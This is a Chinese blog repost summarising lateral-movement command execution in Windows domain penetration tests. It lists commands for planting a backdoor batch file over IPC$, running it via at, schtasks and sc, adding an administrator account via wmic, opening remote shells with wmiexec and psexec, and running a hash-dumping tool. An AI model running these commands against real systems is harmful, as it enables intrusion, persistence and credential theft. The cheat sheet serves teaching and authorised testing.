bat 远程桌面登陆 命令_内网渗透之域渗透命令执行总结

最新推荐文章于 2024-08-11 10:03:49 发布
最新推荐文章于 2024-08-11 10:03:49 发布
阅读量675 收藏 2
点赞数
文章标签: bat 远程桌面登陆 命令 bat循环执行 一秒一次 windows 获取命令执行后的结果 windows结束进程命令 页面 动态显示cmd执行结果

0b88aa743be63cb38ff03d6742dece35.png

前言

AD的全称是Active Directory:活动目录

域(Domain)是Windows网络中独立运行的单位,域之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后两个域之间不但可以按需要相互进行管理,还可以跨网分配文件和打印机等设备资源,使不同的域之间实现网络资源的共享与管理,以及相互通信和数据传输。

在域渗透场景中,我们已经进入内网,会遇到大量的开放端口和服务,弱密码空密码,这个时候我们可以使用它们已经开启的服务选择对应的方式进行命令执行。本文对ad域渗透中常见的命令执行方式进行一个总结。

ipc

前提

开启ipc共享

配置本地安全策略:开始->运行-> secpol.msc->本地策略->安全选项->网络访问:共享>和本地帐户的安全模型>经典-本地用户进行身份验证

配置本地组策略:运行gpedit.msc ——计算机配置——Windows设置——安全设置——本地策略
——安全选项——用户账户控制:以管理员批准模式运行所有管理员——禁用。

文件共享

123456
写入后门文件net use z: \\目标IP\c$ "passwd" /user:"admin"或copy hack.bat \\目标ip\c$#删除连接net use \\目标IP\ipc$ /del

后续使用下面的方式执行

at(win10不可用)

定时任务执行命令

前提

开启windows Event log服务,开启Task Scheduler服务

其余条件同ipc

命令执行

12
at \\170.170.64.19 23:00 c:\windows\system32\calc.exeat \\170.170.64.19 1 delete /yes #删除本机1号任务

schtasks

前提

开启windows Event log服务,开启Task Scheduler服务

其余条件同ipc

123
schtasks /create /tn firstTask /tr "c:\windows\system32\cmd.exe /c calc" /sc once /st 00:00 /S 170.170.64.19 /RU System /u admin /p passwdschtasks /run /tn firstTask /S 170.170.64.19 /u admin /p passwdschtasks /F /delete /tn firstTask /S 170.170.64.19 /u admin /p passwd

telnet

前提

开启telnet服务

命令执行

12
telnet 目标ip之后可执行命令

sc

12
windows2003windows XP

命令执行

123
sc \\170.170.64.19 create testSC binPath= "cmd.exe /c start c:\windows\hack.bat"sc \\170.170.64.19 start testSCsc \\170.170.64.19 delete testSC

wmic

前提

开启wmi服务,135端口

命令执行

123
wmic /node:170.170.64.19 /user:admin /password:passwd process call create "cmd.exe /c calc.exe"wmic /node:170.170.64.19 /user:admin /password:passwd process call create "cmd.exe /c net user test 123456 /add && net localgroup administrators test /add"

wmiexec.vbs(需要安装)

前提

开启wmi服务,135端口

安装

下载vmiexec.vbs

命令执行

123456
cscript.exe //nologo wmiexec.vbs /shell 170.170.64.19 admin passwdcscript.exe wmiexec.vbs /cmd 170.170.64.19 admin passwd "cmdkey /list"cscript.exe wmiexec.vbs /cmd 170.170.64.19 admin passwd c:\programdata\test.bat#其他参数-wait5000 表示这个命令等待5s后再读取结果,用于运行“运行时间长”的命令。-persist 程序会在后台运行,不会有结果输出,而且会返回这个命令进程的 PID,方便结束进程,用于运行 nc 或者木马程序。

impackets wmiexec(需要安装)

前提

开启wmi服务,135端口

安装

123
git clone https://github.com/SecureAuthCorp/impacket/pip install -r requirements.txtpip install impacket

命令执行

12
#获取远程计算机交互式shellpython wmiexec.py admin:passwd@170.170.64.19

psexec(需要安装)

前提

开启admin$共享

安装

在 https://docs.microsoft.com/en-us/sysinternals/downloads/psexec 下载安装

命令执行

12345678910111213
#打开交互式shellpsexec \\170.170.64.19 -u admin -p passwd cmd#执行单条命令psexec \\170.170.64.19 -u admin -p passwd -s cmd /c "calc.exe"#拷贝文件到远程计算机并执行psexec \\170.170.64.19 -u admin -p passwd -c C:\Users\Administrator\Desktop\GetHashes.exe#其他参数–accepteula 第一次运行会弹框,输入这个参数便不会弹框-s 以 “nt authority\system” 权限运行远程进程-h 如果可以,以管理员权限运行远程进程-d 不等待程序执行完就返回,请只对非交互式应用程序使用此选项\\ip 可以替换成 @ip.txt (存放多个 ip 的文本),可以批量执行命令

远程桌面

前提

开启远程桌面,3389端口

命令执行

可直接通过mstsc进入目标系统。

作者:Leticia,文章来源:Leticia's Blog

扫描关注乌云安全

1a3e40721012050bd7b98ec8751590dc.png

觉得不错点个“赞”、“在看”哦cf67f95aebc42a5c06334919582a05f5.png

weixin_39646021
关注
bat 文件等待上一个命令 运行完毕_批处理编写--之--必会DOS基本命令
weixin_30715739的博客
12-28 3792
author:大飞哥一、DOS命令1.1、如何操作DOS命令建议:初学者在虚拟机中完成实验!!!!! ​ 开始---运行---输入cmd--回车,将调出C:windowssystem32cmd.exe 或者 Win + R ---运行---输入cmd--回车1.2、基本命令1. 命令:color f0 帮助:color ? 作用:改变背景及字体颜色 ​ 2. 命令:cls 作用:...
python wmiexec_内网渗透之域渗透命令执行总结
weixin_39633976的博客
12-22 2354
前言AD的全称是Active Directory:活动目录域(Domain)是Windows网络中独立运行的单位,域之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后两个域之间不但可以按需要相互进行管理,还可以跨网分配文件和打印机等设备资源,使不同的域之间实现网络资源的共享与管理,以及相互通信和数据传输。在域渗透场景...
bat 命令返回结果_DOS命令与批处理
weixin_39781323的博客
11-21 522
DOS命令 1.1、如何操作DOS命令 1.2、基本命令 1.3、目录相关命令 建议:初学者在虚拟机中完成实验!!!!! 开始---运行---输入cmd--回车,将调出C:windowssystem32cmd.exe 或者Win + R ---运行---输入cmd--回车 1. 命令:color f0 帮助:color ? 作用:改变背景及字体颜色 2. 命令:cls 作用:清屏 3. 命令:di...
bat脚本实现Windows mstsc系统远程登录,自动输入用户名和密码,并拷贝文件
最新发布
zengliguang的专栏
08-11 467
可能不是 Windows 系统自带的工具,您可能需要从其他来源获取。并且这种模拟输入的方式可能会受到各种因素的影响,例如登录界面的变化、不同的安全设置等。进行远程登录并尝试模拟输入用户名和密码。但请注意,这种方式存在一定的安全风险,并且可能不适用于所有的远程登录场景,特别是那些具有严格安全策略的环境。以下是一个示例的批处理脚本,用于使用。也可以用vbs模拟按键实现。
bat 调用bat 等待执行完成
zengliguang的专栏
03-10 1576
Windows批处理(.bat)文件中,如果你需要调用另一个批处理文件并等待它执行完成后再继续执行后续命令,可以使用call命令来实现。call命令会启动新的批处理文件,并在子脚本执行完毕后返回到父脚本来执行余下的命令。 示例如下: batch @echo off echo 开始执行主脚本... call child.bat echo 子脚本child.bat执行完成,现在继续执行主脚本的其他命令... 在这个例子中,当child.bat被call命令调用时,它将被执行,直
电脑cmd命令大全_电脑小白也需要知道的CMD常用命令总结
weixin_39796752的博客
10-29 1252
点击蓝字关注我获取高效/实用/好玩的工具软件和教程前言Windows 命令提示符(即 cmd)是 Win 系统的一种命令行操作工具,用户可以通过输入命令来完成各种各样的系统或程序操作。虽然很多操作都可以通过图形程序完成,但也有非他不可的情况存在。因此了解一些日常可能用到的简单操作也是很必要的。下面就介绍一些「CMD 常用命令和操作」,可以作为小白入门或者备忘录使用。如何打开 CMD ...
bat 等待上一步取得结果后执行_windows 上安装redis集群(redis-cluster)
weixin_42298876的博客
01-15 210
一, 需要的软件: Redis(windows版本), Ruby环境, Redis的Ruby驱动, 创建Redis集群的工具redis-trib.rb二, 安装redis下载地址: https://github.com/tporadowski/redis/releases/download/v5.0.10/Redis-x64-5.0.10.zip集群至少6个节点, master不能少于3个; 每...
内网渗透之域渗透
m0_57307920的博客
11-05 1112
当母公司的域账户想要登录到子公司的域中时,子公司的域由于信任母公司的域,所以子公司的域会听从母公司的域的域控制器的返回的access key。在一个域中,可能存在多个域控,这些域控不分主域控制器与备份域控制器,每个域控制器充当的是一样的角色,比如你有三个域控制器,你可以在任何一个域控制器上对用户的权限进行修改,你的修改将被复制到其他两个域控制器中,这样,如果一个域控制器发生了故障,只要其他的域控还能正常工作,整个域还是可以正常运行。如,对应的服务类型叫什么,机器名是什么,服务端口号是多少等等。
内网渗透之域渗透命令执行总结
IT教育任姐姐的博客
11-02 390
前言 AD的全称是Active Directory:活动目录 域(Domain)是Windows网络中独立运行的单位,域之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后两个域之间不但可以按需要相互进行管理,还可以跨网分配文件和打印机等设备资源,使不同的域之间实现网络资源的共享与管理,以及相互通信和数据传输。 在域渗透场景中,我们已经进入内网,会遇到大量的开放端口和服务,弱密码空密码,这个时候我们可以使用它们已经开启的服
Windows内网渗透常用命令总结
Sylon的博客
08-15 2367
域内信息收集常用命令 net group /domain //获得所有域用户组列表 net group zzh /domain //显示域中zzh组的成员 net group zzh /del /domain //删除域中zzh组 net group zzh andy /del /domain //删除域内zzh 群组中的成员 andy net group zzh /add /domai...
Windwows内网渗透中常见命令
2ed
07-16 960
ipconfig /all ------ 查询本机IP段,所在域等 net user ------ 本机用户列表 net localhroup administrators ------ 本机管理员[通常含有域用户] net user /domain ------ ...
等待一个已经运行的程序结束
05-14
用两种方法在VC中实现了“等待一个已经运行的程序结束”的功能
渗透测试中常用的系统命令详解(持续更新)
tempulcc的博客
09-10 1695
主要记录自己实际使用过程中,经常使用的window、linux系统命令,持续更新
渗透——AdminSDHolder
broing55的博客
03-26 594
0x00 前言 AdminSDHolder是一个特殊的AD容器,具有一些默认安全权限,用作受保护的AD账户和组的模板。 Active Directory将采用AdminSDHolder对象的ACL并定期将其应用于所有受保护的AD账户和组,以防止意外和无意的修改并确保对这些对象的访问是安全的。 如果能够修改AdminSDHolder对象的ACL,那么修改的权限将自动应用于所有受保护的AD账户和...
渗透常用基础命令
whojoe的博客
01-21 669
渗透常用基础命令信息收集基础命令常用工具 信息收集基础命令 查询与控制器主机名 net group “domain controllers” /domain 查询域管理用户 net group “domain admins” /domain 查看所有域用户 net user /domain 查看加入域的所有计算机名 net group "domain computers" /domain 查看域密码策略 net accounts /domain 常用工具 使用procdump将目标的lsass.
bat 判断文件名字含有某些字段_想给文件夹加个密码?轻松搞定!
weixin_39866774的博客
11-05 345
很多时候,我们希望给某些文件夹加个密码,想要打开,必须输入密码才可以。以此,保护自己的某些重要文件或是小秘密。本文将通过两种方法,教大家如何给文件夹加密码。方法一、手动实现这种方法,以用批处理的办法实现,需要一定的动手能力,过程挺有趣的,适合对电脑比较熟悉的同学。如果你对电脑不是很懂,也没关系,后面,还会给大家提供一种简单的办法。正式开始:首先创建一个文件夹,这其中将要放置以密码保护的子文件夹和用...
cmd命令
涐①直嘟恠的博客
09-21 1800
1、@ 它的作用是隐藏它后面这一行的命令本身(只能影响当前行)。 2、echo 中文为“反馈”、“回显”的意思。它其实是一个开关命令,就是说它只有两种状态:打开和关闭。于是就有了echo on和echo off两个命令了。直接执行echo命令将显示当前echo命令状态(off或on)执行echo off将关闭回显,它后面的所有命令都不显示命令本身,只显示执行后的结果。 echo. :输出空行
渗透常用命令
神隐哥的博客
03-02 1567
信息搜集 net view /domain:XXX 查看XXX域中的机器列表 net view /domain 查看内网中有多少个域 setspn -T jumbolab.com -Q */* 快速寻找内网中注册的服务 net user /domain 查看域用户 net group "domain admins" /domain 查看域管 net time /domain 定位域控。也可以通过ipconfig /all。一般DNS就是域控 nltest /domain_trusts 列出域信任关系 c
Linux文件系统--文件类型
Ucan_Uup的博客
09-08 1087
Linux中一切都是文件,文件类型有多种,使用ls -l命令可以查看文件属性,所显示结果的第一列的第一个字符用来表示文件类型,如下: 1.普通文件 第一列第一个字符为“-”的文件为普通文件。 创建普通文件我们用:touch newfile 命令 删除普通文件我们用:rm newfile 命令 2.目录文件 第一列第一个字符为“d”(directory)的文件为目录文件。 创建目录文件我们用:mkdir directory 命令 删除空目录文件我们用:rmdir directory 命令 删除非空目录文件
Windows内网渗透:远程执行命令技巧
在进行Windows内网渗透时,远程执行命令是关键步骤之一。以下是一些常用的技术和工具: 1. **计划任务(SCHTASKS)**:可以创建一个一次性计划任务来执行命令。例如,`schtasks /create /s 172.16.4.68 /u sakura\...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值